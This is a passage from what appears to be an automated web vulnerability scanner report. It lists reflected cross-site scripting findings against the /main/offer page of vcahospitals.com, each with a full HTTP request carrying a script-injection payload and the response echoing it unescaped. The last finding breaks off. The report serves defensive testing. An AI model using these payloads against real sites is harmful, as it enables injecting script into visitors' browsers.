Path:	/main/offer

Issue detail

The value of the ipaddress request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cea7b"><script>alert(1)</script>d52b0fd037e was submitted in the ipaddress parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243cea7b"><script>alert(1)</script>d52b0fd037e&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:31 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=uefdkgce6dqe7oss7nrn93f4p3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243cea7b"><script>alert(1)</script>d52b0fd037e&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2
...[SNIP]...

2.30. http://www.vcahospitals.com/main/offer [lname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the lname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f871"><script>alert(1)</script>0ec73ab7706 was submitted in the lname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=6f871"><script>alert(1)</script>0ec73ab7706&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:38 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=if7jtr5gtqf6aveee5163p5q63; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=6f871"><script>alert(1)</script>0ec73ab7706&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2
...[SNIP]...

2.31. http://www.vcahospitals.com/main/offer [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79ed5"><script>alert(1)</script>092fe4b7483 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw&79ed5"><script>alert(1)</script>092fe4b7483=1 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:55 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=oiivkiojrucik62g0md3t4kjd6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw&79ed5"><script>alert(1)</script>092fe4b7483=1" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.32. http://www.vcahospitals.com/main/offer [newmex parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the newmex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cd11"><script>alert(1)</script>bb1f3698051 was submitted in the newmex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=04cd11"><script>alert(1)</script>bb1f3698051&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:56 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=kobmgoan4hgeoq1ek4db6fi2v5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=04cd11"><script>alert(1)</script>bb1f3698051&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3f
...[SNIP]...

2.33. http://www.vcahospitals.com/main/offer [optin parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the optin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8827"><script>alert(1)</script>059c58f8099 was submitted in the optin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?&state=FL&optin=1f8827"><script>alert(1)</script>059c58f8099&guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:11 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL&optin=1f8827"><script>alert(1)</script>059c58f8099&guid=2505B0C6-B6AA-4144-878F-54873D353284" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.34. http://www.vcahospitals.com/main/offer [other parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the other request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55d5e"><script>alert(1)</script>d09f3450d0b was submitted in the other parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=55d5e"><script>alert(1)</script>d09f3450d0b&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:31 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=6n7l65heh918gmaumh17hnsri4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
/www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=55d5e"><script>alert(1)</script>d09f3450d0b&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city
...[SNIP]...

2.35. http://www.vcahospitals.com/main/offer [petage parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the petage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48342"><script>alert(1)</script>799b196a043 was submitted in the petage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

